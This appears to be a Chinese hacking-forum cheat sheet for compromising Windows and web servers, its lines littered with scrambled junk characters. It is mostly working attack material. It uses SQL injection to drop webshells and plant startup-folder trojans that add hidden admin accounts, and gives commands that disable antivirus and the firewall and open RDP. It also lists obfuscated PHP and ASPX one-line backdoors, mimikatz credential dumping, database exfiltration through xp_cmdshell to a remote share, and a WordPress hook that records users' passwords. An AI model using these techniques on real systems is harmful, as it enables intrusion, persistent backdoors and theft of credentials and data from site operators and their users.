use test;
- x: d/ @$ {; L h. V' g4 b+ q# h& Acreate table a (cmd text);* C+ X: W% ]/ u
insert into a values ("set wshshell=createobject (""wscript.shell"") " );' S1 z. l! K' w: Z: [! \
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
. N9 h9 y( r o3 r0 b8 b; f2 G- o* V; Ainsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
1 K# o; C$ R) `( Q8 b* v; y2 e/ Xselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";, y8 e* j3 i1 D
drop table a;
' ?. a! W# D" z& H
& _, y2 H3 l: e. b英文版本:
0 I# B8 h4 N$ v8 y$ _2 {' U) |4 a* {2 g, {0 i. L
use test;, }2 @3 @" r y" t p
create table a (cmd text);
/ g# P# Z+ |3 x: h4 jinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
. a8 P$ T* s3 Z p9 @1 X( {; Zinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
5 _+ o3 q3 d8 S5 I* Einsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );4 l; R( c+ B# g z% ^$ I9 g: }" u# p
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
) A/ w' B* u2 i0 Jdrop table a;
- @& p' g# Q; e# F: R# m- j% a+ i, D- n' [ q
create table a (cmd BLOB);
- _" M2 p& H% B' _ |+ o2 C7 finsert into a values (CONVERT(木马的16进制代码,CHAR));
J0 s8 q3 n2 }* xselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'- j' l& i( H6 R
drop table a;7 M; n6 ^) }/ }% G' Z8 `! l
3 G9 v: q# V1 ^- U4 Z. k记录一下怎么处理变态诺顿! ?2 p% L# `6 T) v" s; w
查看诺顿服务的路径
5 K# K: f$ E& c: }( Y! Y1 Zsc qc ccSetMgr3 w. l) F+ F, `, V: Q8 w
然后设置权限拒绝访问。做绝一点。。
- t) y2 i4 y+ R8 [! ~( a. pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
z9 r: ] u7 B0 h, f% j$ R; ^cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
# ~/ N) K6 r! {( rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators1 N& Z! H) D0 A1 Y0 ]! u* V+ Z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone! E' F/ X6 D; b$ w. B, _$ S
' Z: O" c) r3 S2 L- N然后再重启服务器- E* s4 i& B, d& X2 k. Q
iisreset /reboot
' V) K0 u/ S; o7 }2 a) i; ?3 _这样就搞定了。。不过完事后。记得恢复权限。。。。
8 ~: l' x- \6 K% u! G }7 qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F" i. G g8 U/ e+ H( o5 O- `
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
9 L2 v8 Q& H6 i: ^. L; e& qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F( ]4 w( \3 E; t9 ^2 F2 P9 A
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F; P+ x( ?9 H5 J' @; r: N
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin- h5 M; d* C/ C2 a% Q9 r% l. [
- z4 M/ `1 p# \- T4 G4 R% MEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')$ E: f4 b _# C* Y4 e+ e' r
% n- j: l1 `; G' O9 c* k
postgresql注射的一些东西
3 w0 L2 z: s+ W/ z$ \0 d/ `7 Y) r$ m如何获得webshell, h$ z' r2 @8 v+ t- _
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
6 X8 M$ Z4 i$ W& Thttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 5 v: S$ A$ q2 Y3 _) |# A
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;0 z7 p2 x3 W! h% e2 n* C& I* a
如何读文件( Y+ `" t% k3 n2 L* ?% E
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);, w( i/ ?. z0 ^5 `
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
~' W* s0 B( ^* @1 O: i4 B; }http://127.0.0.1/postgresql.php?id=1;select * from myfile;
! O! F/ y6 ^; r( A1 K! L% V# A3 |, y: C2 Z* K! u; i
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
7 b% t E+ |" X当然,这些的postgresql的数据库版本必须大于8.X/ W2 ?$ Y+ y- t1 _# k6 Q1 f
创建一个system的函数:9 H( p( @% V: ?4 Z9 p+ i6 c
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT# j% s$ H$ Y6 ~* W
2 q) D; _$ R4 T8 C3 |
创建一个输出表:
$ P, |/ x7 w7 X T* ]CREATE TABLE stdout(id serial, system_out text)9 y1 R: }: B3 H6 D6 Z2 ^* U
% r7 m: D) |+ C1 h3 x
执行shell,输出到输出表内:4 Y# @* y N# U" _8 l0 E
SELECT system('uname -a > /tmp/test')
2 W5 X. U8 i/ b0 ]
1 z3 h/ C: U; Q! xcopy 输出的内容到表里面;
2 s% r r" t wCOPY stdout(system_out) FROM '/tmp/test'( b! K! I9 Y1 t" J) C( ?
+ Q' o5 e0 j) A% S& H3 B
从输出表内读取执行后的回显,判断是否执行成功
6 _& r5 F# J* ^: V) M& N0 h: A
' S1 ]( i) L. R) W( x% V2 D* x$ xSELECT system_out FROM stdout2 E: |: j! a5 U3 M# X" i; C b
下面是测试例子
) ~5 y5 Q4 }( m$ D+ K" X* M, K& h; w$ p* }3 M% I
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
# Y/ F5 Z. Y+ J8 A
- B2 y+ o( N* k% f/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
7 s7 V6 N1 b* t5 z8 SSTRICT --* x( n4 Y' P. [5 {, d5 v- D
) C- j, |5 {0 s% Y V' j$ x1 o1 r& w
/store.php?id=1; SELECT system('uname -a > /tmp/test') --, o0 `) V! E9 e3 c
- |! N$ R" k" W2 C) e- c
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --' M! a& y6 m, j( y' w8 B8 b
- D" X. ^5 r& ]& r; K! [& ^
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
' N: N a9 S4 e( Gnet stop sharedaccess stop the default firewall/ ^, @) Z7 M& C; T0 k$ b. v
netsh firewall show show/config default firewall
$ P( W5 h O# w$ y1 tnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall; b$ m# D! Q$ u ?
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
\; g: D) U/ K I- |# B R修改3389端口方法(修改后不易被扫出)" A* g+ c3 Y' [4 q- V- G. v
修改服务器端的端口设置,注册表有2个地方需要修改' A! e [* B, V3 M; K: j4 u/ Y/ R
( D1 [8 C( k9 `[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
5 E) s% h y( h1 Y5 xPortNumber值,默认是3389,修改成所希望的端口,比如6000! @1 n( o7 B8 ~& S
- p7 l5 F3 F: E" g5 }' h6 j( a; Z第二个地方:
# u+ J( c7 S- K& ]6 A8 a[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
* p& F0 @) F! N% NPortNumber值,默认是3389,修改成所希望的端口,比如6000( \; i! z1 Z; M: W4 U- ?
, Q3 N4 B7 A% y现在这样就可以了。重启系统就可以了7 X& x8 _ `1 D9 O
' o* S1 d, f. S+ x: [, x R4 J- V: f
查看3389远程登录的脚本: K* v# c! h1 u1 Y; R
保存为一个bat文件
8 i- m7 n& R" I' u9 Tdate /t >>D:\sec\TSlog\ts.log9 E8 e5 q% x" }- d. r
time /t >>D:\sec\TSlog\ts.log# t; |4 X1 G1 ~# U; I8 i/ m
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log) F3 V1 A% \- C
start Explorer
; u3 _$ u8 e- E$ i5 x& `
5 q: \# `6 I, _9 a( Z8 _6 @- z" gmstsc的参数:1 ~" O% s# [4 \% n9 S
; q) Z. P" n# D远程桌面连接
; B+ e2 \1 T" A# U: R2 \7 ^/ |
9 ?. w3 k- f0 ^( s' z2 q, kMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
1 \: k0 H# Q% R, u m/ L [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
4 \6 t( q1 G- S/ R
0 m2 g% H+ ^1 N7 c<Connection File> -- 指定连接的 .rdp 文件的名称。. B3 ]3 j0 V/ u, z0 ~: U/ R
6 L3 Y% j1 Q3 ?1 d1 a5 E% M/v:<server[:port]> -- 指定要连接到的终端服务器。8 q. c& v7 W+ H4 \9 H7 M" |3 Q
9 Q# |# f; w4 B2 {5 \* z4 y
/console -- 连接到服务器的控制台会话。
0 w* t8 S- R) v. M# @, J5 h: M) W! z; h2 E1 n; y) r% Y0 P9 n
/f -- 以全屏模式启动客户端。
3 J5 k# N5 ]$ K$ @
8 r: [2 q8 X1 d# H/w:<width> -- 指定远程桌面屏幕的宽度。$ E5 W9 [ M# K9 N2 H. Z
" D; g0 z, G7 e- q8 B- n* j E
/h:<height> -- 指定远程桌面屏幕的高度。
* V1 S7 w+ y, o/ Z: b+ I
8 l; v8 e+ M+ z9 z3 G) g/edit -- 打开指定的 .rdp 文件来编辑。1 _, S9 ^1 d+ O0 t1 s; t* D3 I2 b
8 y7 n$ N; j$ C. Q" T# T3 I9 x/migrate -- 将客户端连接管理器创建的旧版
( d5 W; ?! \8 c; o! U5 e8 I/ c6 p连接文件迁移到新的 .rdp 连接文件。
9 g2 q& J3 M$ N- S$ R0 e! e* _* ^0 u8 `2 t- ?6 `
% U3 |/ s1 b" l8 C( E! ~1 |
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
+ g$ S+ r, `! ]4 Qmstsc /console /v:124.42.126.xxx 突破终端访问限制数量7 D2 e( }8 l c& J
- H h' ^0 d* }7 |命令行下开启3389
# b+ n5 q( b8 n1 e! A+ mnet user asp.net aspnet /add
; e8 t4 a s% E8 Y9 pnet localgroup Administrators asp.net /add
j# C' K2 ^8 Pnet localgroup "Remote Desktop Users" asp.net /add5 j* K7 g# ?4 u
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D+ M) b& U i& |6 n1 ?
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
) l/ o# ?% H0 N- Cecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1 D) [0 W- C6 J/ {
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f6 g1 m3 S+ B3 m$ ~& r
sc config rasman start= auto
* \1 _2 u" A9 |; Y- Tsc config remoteaccess start= auto
& |& F F" J& Onet start rasman4 i N! f% w" C: |3 M
net start remoteaccess
|, B& V/ ^) U! @Media: t9 {: {) k0 `% ~! H [
<form id="frmUpload" enctype="multipart/form-data"
- a$ [4 F& u4 {9 K! x9 P3 gaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
+ m' n+ M- K% f4 X8 x) n# `<input type="file" name="NewFile" size="50"><br>+ [: ]" ?: t1 K2 e9 p0 N" l3 t
<input id="btnUpload" type="submit" value="Upload">$ `4 l9 `7 ?' }+ b) S
</form>
% v) a2 C3 q8 k* ^4 w7 f. y5 H- n; L( R! q9 h
control userpasswords2 查看用户的密码- b8 n, }7 h& E' Q
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径& K% N7 K" n* c" Z
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a4 A. P: ~! y9 I. ?$ J- s+ Z
+ O8 b4 g7 X' |. Z! e/ B* \141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:2 \0 L+ i; r9 I) c: \& \ }
测试1:+ o5 ]+ T2 R! k- T2 n+ ^
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
) S3 | @( P& t: @( q. P) V- }" y6 O
测试2:
% u$ G& V9 ?: u* F/ G3 D
* m: T+ @2 [7 g# ~ ?create table dirs(paths varchar(100),paths1 varchar(100), id int) e" ? ~0 s: p( m5 h8 Q9 _9 m
) [7 R( v8 U) M/ D2 L
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
# C L; u3 r5 X' F' o' w
4 G9 [& B, N& v; X5 L# v) l" [7 o4 JSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1$ n& n9 G0 F! ]7 S/ f/ H& d% u* S
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令: w( B' p! w- k. z+ Y/ {4 a
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
5 R& v! ]$ ^* B& w* ?9 r1 P& anet stop mcafeeframework: O% f( X2 P5 U" u+ _. ^
net stop mcshield
! |3 h& S& I* P7 Y* ^net stop mcafeeengineservice. k7 V& i5 R- o" f" t6 R
net stop mctaskmanager
9 s7 U: Y" u5 A7 Hhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D. ~* H F7 Y$ O# j# s1 a
% D5 |9 F$ F/ Y: } s$ M# Z VNCDump.zip (4.76 KB, 下载次数: 1)
. Q9 v( R- I# m9 g& l5 D2 \密码在线破解http://tools88.com/safe/vnc.php
! R! \# Q& A( d K$ zVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取. i8 G8 C8 c5 v* a) ]1 T
1 V, D) c% x7 {+ p2 G; p! N
exec master..xp_cmdshell 'net user'
. U+ H# W2 o: N+ n% b6 \9 ?+ z5 ^mssql执行命令。2 I" y* }' a# K/ I1 r1 t" j t. h
获取mssql的密码hash查询
/ R+ C+ z- i1 U3 I, j: jselect name,password from master.dbo.sysxlogins
0 ~9 O! j1 B- G0 S5 g0 U. I/ ]2 L4 B
, h2 ]- X- |6 S0 j1 k& b% o; r7 {, }backup log dbName with NO_LOG;* @0 x4 w% ?8 t' b; h) u! R
backup log dbName with TRUNCATE_ONLY;. ^& U( X& D1 O+ m
DBCC SHRINKDATABASE(dbName);5 \ B7 @. l# }6 ?! t |4 V U' x
mssql数据库压缩
* |" G2 W! k; Q1 p
8 x' J& t. X; IRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
# q, D% b# q' n0 }0 G将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
% I4 e% T4 h! p5 X3 `
: N. S d/ d. v/ ^1 @& s/ ybackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak': k1 @ M3 a" g! m. [! z5 {3 V
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
, m9 ^) D4 N% Z; J# J
$ W7 E, J2 L, s$ r3 a, _0 ODiscuz!nt35渗透要点:. h) U* ?" }" |( j3 J9 R; I0 D- v$ p
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default: r% \ u0 E# x4 H8 V# e& f! @
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>9 U3 V+ Q* X9 O8 n+ q6 w1 b
(3)保存。
" I/ w. ?; K' r(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass5 @6 N1 M$ r$ f, N9 A
d:\rar.exe a -r d:\1.rar d:\website\
. k2 q7 P8 |8 ?0 Z3 y7 u递归压缩website8 ^0 _9 f3 X7 A8 v% i8 C' |- z% K
注意rar.exe的路径
4 f* p3 W3 _' h4 x" G8 z( e) Y7 z$ J, ?; v' ~
<?php
( P; H! i/ F% f' q) F& R' v" m7 n5 e! V4 M) Y- U4 o- }# ]
$telok = "0${@eval($_POST[xxoo])}";! Q' \, T5 K2 |
2 G0 I. b A" Q' ], H2 M8 @
$username = "123456";" g- \9 y7 R4 H2 R0 Z
" f" U$ z5 n. Q) n0 K$userpwd = "123456";
' L" s8 f5 ?3 m; R6 U5 E+ g" k. }4 m) t7 Z8 C& G5 F5 F C
$telhao = "123456";
( f- w. L: h4 Q. l3 {, d: n% ?, Z1 W
$telinfo = "123456";5 y5 p* j; q7 s
8 Q. r9 m% |7 ~4 W- ]/ {
?>2 L8 V1 A1 @4 w( U! y3 l
php一句话未过滤插入一句话木马" Y$ z, N9 _; [" f: U
9 N5 s) {3 R6 P; M站库分离脱裤技巧; A R+ w/ Z7 u* ^. e4 q
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'. g, \# ~0 _2 ^) M$ F
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'( o* M V7 R' \5 |$ |8 Z# j" i
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。, c4 J1 H: C: J: o- W
这儿利用的是马儿的专家模式(自己写代码)。
% }3 N; `: A+ d \* A- H3 w0 Q- yini_set('display_errors', 1);
% r. N5 a0 W% N+ o1 X5 _! J3 [! zset_time_limit(0);! P. f- f O* h! z5 d
error_reporting(E_ALL);
6 f" d/ ? y) ~$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error()); y4 t( c( u `" b/ L' ? o3 w2 e
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
3 o2 K4 t! Q8 c- C) N$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());. O* Q c- k; C6 E% v5 G; Z' I/ m* ?( L
$i = 0;7 I6 N1 Y; X7 L( o# U; H
$tmp = '';. O- ?9 H' b+ h; A% Y% p5 H
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {8 z3 z+ h4 O7 h3 H2 h
$i = $i+1;& |4 l9 W( k9 }
$tmp .= implode("::", $row)."\n";
4 t9 K% M d* D( k+ r& s if(!($i%500)){//500条写入一个文件
; O6 ^9 ?* I: B& y2 R $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';* @1 G ^ i# l! C! Y3 ]
file_put_contents($filename,$tmp);
! i8 I) N. ]5 b4 u7 d $tmp = '';$ [4 \ @& E1 s6 B
}
9 J. _$ L& M4 G2 t. H! j5 Y}8 t% {* B% _# N! [# f$ F
mysql_free_result($result);
* e% P/ b3 d5 z5 W5 w0 Y& i( L( N D! z+ J E9 q! c+ n: x
% N# U* H* t7 d) E5 ^
. ^5 j2 l1 r1 {* l5 _- u l//down完后delete
/ m( ?) h0 [+ K( d0 \8 @
& I: @1 }% @5 B! T3 B1 T0 M
- c! U) c1 g G7 E, n( Y2 o( Fini_set('display_errors', 1);$ v5 h& ^/ K6 e4 A
error_reporting(E_ALL);
( P7 J. D8 b; o) L$i = 0;" }! Y. @8 ^& a7 |7 `
while($i<32) {5 s3 F9 @) V) o$ c0 H
$i = $i+1; h: z- m! ]" m1 ?( `0 l
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
& i( u, |- f7 n, f n2 v/ a unlink($filename);5 L& }4 K/ c" H r8 f
} ; e1 r7 J; n: u
httprint 收集操作系统指纹
8 J, B2 i _ L, s扫描192.168.1.100的所有端口& E' n" G+ v% S2 }1 ~( I8 c
nmap –PN –sT –sV –p0-65535 192.168.1.1003 ^, z. g" H+ n, w. O$ ^
host -t ns www.owasp.org 识别的名称服务器,获取dns信息' I1 E+ Y$ e# i
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输8 T3 m$ N4 Q) _; @
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
9 q9 h3 Q2 h: L7 K: ~. O4 h4 a1 B8 Y0 Q' j2 ~ R
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
# C9 x/ ]4 I4 U7 [' Q% L- u# A$ G2 o4 k( n
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
9 ^1 z. ^- R; r8 |- S( x- m) l% x" L, ]: W T* a3 D5 }
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x; Q# \$ p* r& A
! v9 U& R& ?0 }/ S% f7 ^5 V5 D DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
$ R$ H2 F. ?2 P) V6 h# L. c2 I/ a8 @7 J) }/ d
http://net-square.com/msnpawn/index.shtml (要求安装)
/ p4 c0 f; J: N- f6 ^- f h4 ^ A0 B* f/ \
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
5 l+ \/ c e' L. A/ r; m/ R, X, P) z
% S. d/ M; e% w b( m SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找) i& F Y9 {0 m L% S% v
set names gb2312
% t) W2 ~$ K& T导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
3 I# i, e9 y+ A1 V* T4 C6 p) |: C- y; B x
mysql 密码修改
. c# a1 L0 Z$ KUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 0 J: E; d6 q' u& [- Z
update user set password=PASSWORD('antian365.com') where user='root';+ r3 ?' |5 @- A2 c
flush privileges;) x7 a- j/ Y' A, q) P: Y" v
高级的PHP一句话木马后门& u+ W( b# v' M M5 n! n% e
9 g4 q9 F! L6 p入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀+ C5 b; o: C. J, M" d7 Y9 X
" v8 ^$ {( `% g. [0 E i1、
! g$ K% {1 ^- w2 u- }5 {. G
- V2 q3 v. B7 w7 |$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
; `; R) p/ |7 u' Z/ G( \, C' ?" R& N4 c2 u+ @. x$ J2 L
$hh("/[discuz]/e",$_POST['h'],"Access");
! e; W, U% v) m
5 u: d' z4 U* s: ?9 W( T- k//菜刀一句话
2 n) h# f2 L% t4 q5 x# r( g* L6 i% l+ F- X0 b3 a* V
2、
# t9 o$ @3 j# V$ w" H- R& f1 X& p% N: t7 n5 q
$filename=$_GET['xbid'];& c% p/ g& B/ d. |. \
: M! ]$ |7 A7 C6 f$ X
include ($filename);
% b7 t" a0 t3 R& k4 O4 X, d4 I i5 O1 h! i
//危险的include函数,直接编译任何文件为php格式运行
, X2 W2 A0 z& N3 o3 L0 u1 d5 v/ E3 R! s8 j, }
3、
' \; e2 @ V' _' F- z0 @0 P- A9 r5 s3 m% p4 k- u
$reg="c"."o"."p"."y";
) ]3 g) f- F# r0 S ~6 z5 u. g7 Z& }& @3 {: e; u5 s7 P
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);( t' m% R+ Q# [( m$ D) y; [, A
; q. L$ P" f. x! p! H# V! `
//重命名任何文件 R/ P0 T- z" M( y% R) j
) l0 b {; D, `8 R) Z! i, X2 M5 P4、* p" v: S" I: K9 `2 l% f/ A; x9 t7 S
: g! h7 A% m) S$ O& Z9 j8 p, z) v
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
' S) N- R2 k% m5 {2 o% s0 k, ?& X7 O6 s$ m! b: x( [: ~! S
$gzid("/[discuz]/e",$_POST['h'],"Access");- ?, E# }4 U5 [
0 r3 P' p+ Z) g2 O5 X3 d# m6 Z
//菜刀一句话
: `: _5 j ?* ]# W4 Z/ s; i4 L
5、include ($uid);: u0 q5 e, I$ n/ X& R" J+ Q. L+ }
9 u1 y9 V5 z& Z
//危险的include函数,直接编译任何文件为php格式运行,POST
/ D4 E1 v1 J: q+ P# d" V8 D$ S' ]; _4 k* V% T" e1 v* m. i# A: c7 o# A
& Q. V* I, N- h+ S8 o1 v//gif插一句话9 g/ Y" m8 }+ \, M. v7 s
) L6 K% ]6 n% o# G6、典型一句话
! S/ Q9 j0 Y2 x8 z9 s6 S- H5 I
5 z! t: {9 k% B$ g5 F/ K程序后门代码
1 \# ^8 S. s6 B8 H6 b: J+ J# G<?php eval_r($_POST[sb])?># e6 i. t$ r" G/ ~9 V$ q; C! Z
程序代码1 H% g a5 a9 k% e
<?php @eval_r($_POST[sb])?>$ V4 c5 j$ M" Y/ T6 P- L; I
//容错代码
* H% p9 j' B7 n! D* E程序代码4 h# w6 D( `# U2 m8 j
<?php assert($_POST[sb]);?>
+ z/ K |& Q6 Q3 z" | f//使用lanker一句话客户端的专家模式执行相关的php语句
' L, L1 ^3 n6 `7 D1 Z8 r' Q1 X程序代码
' t& ^& b- R1 D$ O# p<?$_POST['sa']($_POST['sb']);?>0 t, B* U w: T. g$ U
程序代码0 Y! ?7 ]5 W' R+ h! Y
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>: B) [, m& R& G2 q& ?& h7 H
程序代码2 i) k2 _5 V9 p1 o/ U8 }; R$ Y$ o! P
<?php" X7 }/ l/ a9 v% `
@preg_replace("/[email]/e",$_POST['h'],"error");
7 A( \ M/ d% l9 y7 q?>
& L/ B& e, ]1 X) u7 c//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
6 s5 g1 c) O; B9 b程序代码
& p& K6 K9 f- r- @$ L5 `9 Z1 v<O>h=@eval_r($_POST[c]);</O>
t; g9 e: v1 e; C) q程序代码
6 Q% E* T: Z% R1 |& K- ]<script language="php">@eval_r($_POST[sb])</script>
" U1 G0 H- i! \, P$ t& M//绕过<?限制的一句话+ P/ C& L& p& u, b5 L
- F% o, F, Y- e0 y. Q) K) T
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
4 o: u0 Z1 d/ V& w. V详细用法:
& J/ c# W0 g% g9 Z0 ^. |4 p! B- B1、到tools目录。psexec \\127.0.0.1 cmd
2 A& ~2 F- j1 Q |$ i2、执行mimikatz6 S) \3 j" }+ }; r/ Q' b
3、执行 privilege::debug. Q/ J- b4 t6 q6 c& B# O. ^( |
4、执行 inject::process lsass.exe sekurlsa.dll9 D) w( j% ~1 w& ?8 A+ j! [* L* o
5、执行@getLogonPasswords
1 d ~% K5 I* N; c) ] M; r h6、widget就是密码/ `1 |& F) ?. V9 b, {" g& w
7、exit退出,不要直接关闭否则系统会崩溃。' }) O: q; d9 e- d+ K
1 n- t _% o" h% c4 g4 t3 ]http://www.monyer.com/demo/monyerjs/ js解码网站比较全面( x. f$ e2 S1 H8 r& h- | G: h
; P* f. O! S. Q6 S1 [ v$ M+ I自动查找系统高危补丁
! w1 o* N* H4 s- h0 w$ Y% r1 Gsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt, o! D+ A* p- f
& B9 K3 B: p# Q. c4 O突破安全狗的一句话aspx后门
3 i* q/ }$ S$ i4 @<%@ Page Language="C#" ValidateRequest="false" %>6 @* [, F0 f- w
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>5 X5 E0 l0 u ?9 X: [' p# y
webshell下记录WordPress登陆密码$ m1 W5 o# P7 |, K4 ?1 _
webshell下记录Wordpress登陆密码方便进一步社工" a. N9 t3 L! }! V
在文件wp-login.php中539行处添加:
5 ^( Z$ k; f2 h, q: z// log password- C" H$ S8 w: y: d8 I9 K9 G2 w
$log_user=$_POST['log'];: |; y% q/ J& ~* r3 g# v0 n( s' O
$log_pwd=$_POST['pwd'];
1 u: {2 ~4 d- K, |/ k$log_ip=$_SERVER["REMOTE_ADDR"];
2 P8 c; n, X- M1 I! S, Q9 y$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;2 u7 P7 _( p4 X; R2 D
$txt=$txt.”\r\n”;
" V. x! N9 g( t% `7 pif($log_user&&$log_pwd&&$log_ip){2 u: m0 k* Z1 i* p6 T* c- k: L
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
; ~. G3 q- B" X}
/ S; U: R& b4 h2 R; C& e当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。% k1 Z, l: r& y% V1 I4 h" v
就是搜索case ‘login’
